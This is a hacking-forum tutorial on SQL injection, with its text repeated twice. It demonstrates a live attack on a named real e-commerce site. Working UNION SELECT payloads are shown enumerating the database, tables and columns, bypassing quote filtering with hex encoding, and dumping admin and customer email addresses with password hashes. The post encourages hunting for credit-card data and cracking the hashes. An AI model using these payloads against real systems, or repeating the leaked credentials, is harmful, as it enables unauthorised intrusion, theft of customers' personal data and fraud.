SQL Simple Injection Tutorial By Beastar! 12-28-2012, 09:24 PM
#1
Helo DZ members
Today i will make tutorial For SQLI its simple
Later i will post SQLI bypass Forbidden ( waf)
Well Lets start
we need dorks to get vulnerability websites
Search at forum or google
Lets Go
1-Lets make sure if the site if vuln or not
It show
Some erros could be found
· mysql_num_rows()
· mysql_fetch_array()
· Error Occurred While Processing Request
· Server Error in '/' Application
· Microsoft OLE DB Provider for ODBC Drivers error
· error in your SQL syntax
· Invalid Querystring
· OLE DB Provider for ODBC
· VBScript Runtime
· ADODB.Field
· BOF or EOF
· ADODB.Command
· JET Database
· mysql_fetch_row()
· Syntax error
· include()
· mysql_fetch_assoc()
· mysql_fetch_object()
· mysql_numrows()
· GetArray()
· FetchRow()
· Input string was not in a correct format
· Microsoft VBScript;
QUICK SQL COMMANDS OVERVIEW:
UNION ALL ***8211; Combine multiple columns
SELECT ***8211; Selecting the information you want
ORDER BY ***8211; Orders columns by alphabetical or numerical order
LIMIT ***8211; The number of the selected field to be displayed
FROM ***8211; Selecting where you want to pull the information you want from.
CONCAT ***8211; Short for concatenate which means to combine two strings into a one.
GROUP_CONCAT ***8211; Grouping all values from a concatenated string
2-We use ORDER-BY TO DETERMINE THE NUMBER OF COLUMNS:
3-Time to use UNION SELECT
http://collards.co.za/customer_testimoni...ial_id=-14 UNION SELECT 1,2,3,4,5,6,7,8,9--
Make sure to include the - in the beginning and the -- at the end
We willfind A number in this resultat
in this situation we found this number : 3
4- Now i will show you this method but it work for Databases version 5+ no less
Now lets know this website database version
l
Follow commands carefully please
Resultat :
collards_osc1collards_osc1@localhost5.0.95-community
5- Getting Admin info or CCs or Email/Pass Time!
This command to get tables :
Resultat :
Well i think we will need Admin table haha
OMG resultat :
This site is injectable sry guyz cya next timePP
Kidddddddding
Lets rock more
So we make Hex to the table name
Well brothers to get hex you need download Hackbar 1.6 Add_ons ( mozilla firefox)
its the best for hacker!
well i dont know if theres hex maker in the net you can check it
Now delete "admin"
hex it
go to the hackbar
Encoding > Hex Encoding > String to 00ff00ff00
you can do it with char or other strings but i will use this in this tutu
Resultat :
Wait not done yet!!
add 0x to the hex just like that
Fuck yeah we got it
Columns name in Admin table are ( resultat ) :
ok now lets get datas
Dont use hexed admin here use it normal
ok Some poeple use this command 0x3a or 0x0a to make space between the datas!!
OR
Resultat :
Bompp we got admin login
Looks like we got Hashed passwords... damn
Hashed could be MD5 SHA1 and alot more
check this site its the best!!!
http://www.crypo.com
in this tutorial ill give you another change to more understand sql
Let me get Customers info for youPP
Lets choose Customers table now
Same shit!!!!!!
Lets make hex
Customers > HEX YES
"Customers"> NO Delete the " " remember !
and of course we add 0x to the hex as i told you before
Resultat:
Lets choose
customers_email_address
customers_password
Command :
Resultat :
Guyz About those crackers dont get confused
http://devil-zone.net/vb/showthread.php?...-Crackers/
I hope you all Learned And if theres any problem reply here i will try help
By the way here some for my injected sites to DZ
http://devil-zone.net/vb/showthread.php?...-CC)-By-me
Today i will make tutorial For SQLI its simple
Later i will post SQLI bypass Forbidden ( waf)
Well Lets start
we need dorks to get vulnerability websites
Search at forum or google
Lets Go
Code:
http://collards.co.za/customer_testimonials.php?&testimonial_id=141-Lets make sure if the site if vuln or not
Code:
http://collards.co.za/customer_testimonials.php?&testimonial_id=14'It show
Code:
1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1Some erros could be found
· mysql_num_rows()
· mysql_fetch_array()
· Error Occurred While Processing Request
· Server Error in '/' Application
· Microsoft OLE DB Provider for ODBC Drivers error
· error in your SQL syntax
· Invalid Querystring
· OLE DB Provider for ODBC
· VBScript Runtime
· ADODB.Field
· BOF or EOF
· ADODB.Command
· JET Database
· mysql_fetch_row()
· Syntax error
· include()
· mysql_fetch_assoc()
· mysql_fetch_object()
· mysql_numrows()
· GetArray()
· FetchRow()
· Input string was not in a correct format
· Microsoft VBScript;
QUICK SQL COMMANDS OVERVIEW:
UNION ALL ***8211; Combine multiple columns
SELECT ***8211; Selecting the information you want
ORDER BY ***8211; Orders columns by alphabetical or numerical order
LIMIT ***8211; The number of the selected field to be displayed
FROM ***8211; Selecting where you want to pull the information you want from.
CONCAT ***8211; Short for concatenate which means to combine two strings into a one.
GROUP_CONCAT ***8211; Grouping all values from a concatenated string
2-We use ORDER-BY TO DETERMINE THE NUMBER OF COLUMNS:
Code:
http://collards.co.za/customer_testimonials.php?&testimonial_id=14 order by 15-- ERROS
http://collards.co.za/customer_testimonials.php?&testimonial_id=14 order by 10-- ERROS
http://collards.co.za/customer_testimonials.php?&testimonial_id=14 order by 9-- NO ERROS3-Time to use UNION SELECT
http://collards.co.za/customer_testimoni...ial_id=-14 UNION SELECT 1,2,3,4,5,6,7,8,9--
Make sure to include the - in the beginning and the -- at the end
We willfind A number in this resultat
in this situation we found this number : 3
4- Now i will show you this method but it work for Databases version 5+ no less
Now lets know this website database version
lFollow commands carefully please
Code:
http://collards.co.za/customer_testimonials.php?&testimonial_id=-14 UNION SELECT 1,2,CONCAT(database(),user(),version()),4,5,6,7,8,9--Resultat :
collards_osc1collards_osc1@localhost5.0.95-community
Code:
Database name : collards_osc1
Localhost : collards_osc1@localhost
Database versin : 5.0.95-community5- Getting Admin info or CCs or Email/Pass Time!
This command to get tables :
Code:
http://collards.co.za/customer_testimonials.php?&testimonial_id=-14 UNION SELECT 1,2,group_concat(table_name),4,5,6,7,8,9 from information_schema.tables where table_schema=database()--Resultat :
Code:
additional_images,address_book,address_format,admin,admin_files,admin_groups,admin_projects,admin_tasks,admin_tasks_priorities,admin_tasks_statuses,anti_spambot_contact,article_faqs,article_faqs_description,article_forms,article_reviews,article_reviews_description,articles,articles_description,articles_to_topics,articles_xsell,authors,authors_info,banners,banners_history,banners_to_categories,cache,categories,categories_description,configuration,configuration_group,contact_emails_sent,counter,counter_history,countries,currencies,customer_service,customer_testimonials,customers,customers_basket,customers_basket_attributes,customers_favourite,customers_info,customers_temp,customers_to_extra_fields,customers_wishlist,customers_wishlist_attributes,define_content,define_content_description,downloads,events_calendar,extra_fields,extra_fields_info,faq,featured,footlinks,geo_zones,information,languages,maillist,manufacturers,manufacturers_info,more_article_images,newsdesk,newsdesk_categories,newsdesk_categories_descrWell i think we will need Admin table haha
Code:
http://collards.co.za/customer_testimonials.php?&testimonial_id=-14 UNION SELECT 1,2,group_concat(column_name),4,5,6,7,8,9 from information_schema.columns where table_name="admin"--OMG resultat :
Code:
1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\"admin\"--' at line 1
select * FROM customer_testimonials WHERE testimonials_id = -14 UNION SELECT 1,2,group_concat(column_name),4,5,6,7,8,9 from information_schema.columns where table_name=\"admin\"--This site is injectable sry guyz cya next time
PPKidddddddding
Lets rock more
So we make Hex to the table name
Well brothers to get hex you need download Hackbar 1.6 Add_ons ( mozilla firefox)
its the best for hacker!
well i dont know if theres hex maker in the net you can check it
Now delete "admin"
hex it
go to the hackbar
Encoding > Hex Encoding > String to 00ff00ff00
you can do it with char or other strings but i will use this in this tutu
Resultat :
Code:
http://collards.co.za/customer_testimonials.php?&testimonial_id=-14 UNION SELECT 1,2,group_concat(column_name),4,5,6,7,8,9 from information_schema.columns where table_name=61646d696e--Wait not done yet!!
add 0x to the hex just like that
Code:
http://collards.co.za/customer_testimonials.php?&testimonial_id=-14 UNION SELECT 1,2,group_concat(column_name),4,5,6,7,8,9 from information_schema.columns where table_name=0x61646d696e--Fuck yeah we got it
Columns name in Admin table are ( resultat ) :
Code:
admin_id,admin_groups_id,admin_firstname,admin_lastname,admin_email_address,admin_password,admin_created,admin_modified,admin_logdate,admin_lognum,admin_cat_access,admin_right_accessok now lets get datas
Code:
http://collards.co.za/customer_testimonials.php?&testimonial_id=-14 UNION SELECT 1,2,group_concat(admin_email_address,admin_password),4,5,6,7,8,9 from admin--Dont use hexed admin here use it normal
ok Some poeple use this command 0x3a or 0x0a to make space between the datas!!
Code:
http://collards.co.za/customer_testimonials.php?&testimonial_id=-14 UNION SELECT 1,2,group_concat(admin_email_address,0x0a,admin_password),4,5,6,7,8,9 from admin--OR
Code:
http://collards.co.za/customer_testimonials.php?&testimonial_id=-14 UNION SELECT 1,2,group_concat(admin_email_address,0x3a,admin_password),4,5,6,7,8,9 from admin--Resultat :
Code:
vivienne@cosmicwalk.com 89793b3210992786b3dac3e2167a1926:4b,branwen@web-inn.co.za 484856a059ba526bb8779e9f1e7d50b7:b0,alan@web-inn.co.za 883819a4096b44b0e46faf27c8d85508:51,vivienne@web-inn.co.za 9399f4ca292e822a74357fe6841cc6e1:53,philip@genfin.co.za 7acd4b507d3fcda27b1a19f070cb8050:e3Bompp we got admin login
Looks like we got Hashed passwords... damn
Hashed could be MD5 SHA1 and alot more
check this site its the best!!!
http://www.crypo.com
in this tutorial ill give you another change to more understand sql
Let me get Customers info for you
PPLets choose Customers table now
Code:
http://collards.co.za/customer_testimonials.php?&testimonial_id=-14 UNION SELECT 1,2,group_concat(column_name),4,5,6,7,8,9 from information_schema.tables where table_name="customers"--Same shit!!!!!!
Lets make hex
Customers > HEX YES
"Customers"> NO Delete the " " remember !
and of course we add 0x to the hex as i told you before
Code:
http://collards.co.za/customer_testimonials.php?&testimonial_id=-14 UNION SELECT 1,2,group_concat(column_name),4,5,6,7,8,9 from information_schema.columns where table_name=0x637573746f6d657273--Resultat:
Code:
customers_id,purchased_without_account,customers_gender,customers_firstname,customers_lastname,customers_dob,customers_email_address,customers_default_address_id,customers_telephone,customers_fax,customers_password,customers_newsletter,member_levelLets choose
customers_email_address
customers_password
Command :
Code:
http://collards.co.za/customer_testimonials.php?&testimonial_id=-14 UNION SELECT 1,2,group_concat(customers_email_address,0x0a,customers_password),4,5,6,7,8,9 from customers--Resultat :
Code:
vivienne@web-inn.co.za d55c27b7aa6ac812426c8545fefeeaf5:2e,mail@branwen.co.za 5955085acd2db1e40b9cbe27274ea733:3fGuyz About those crackers dont get confused
http://devil-zone.net/vb/showthread.php?...-Crackers/
I hope you all Learned And if theres any problem reply here i will try help
By the way here some for my injected sites to DZ
http://devil-zone.net/vb/showthread.php?...-CC)-By-me
![[+]](https://sinister.ly/images/modern/collapse_collapsed.png)
![[Image: 117g3mb.jpg]](http://oi48.tinypic.com/117g3mb.jpg)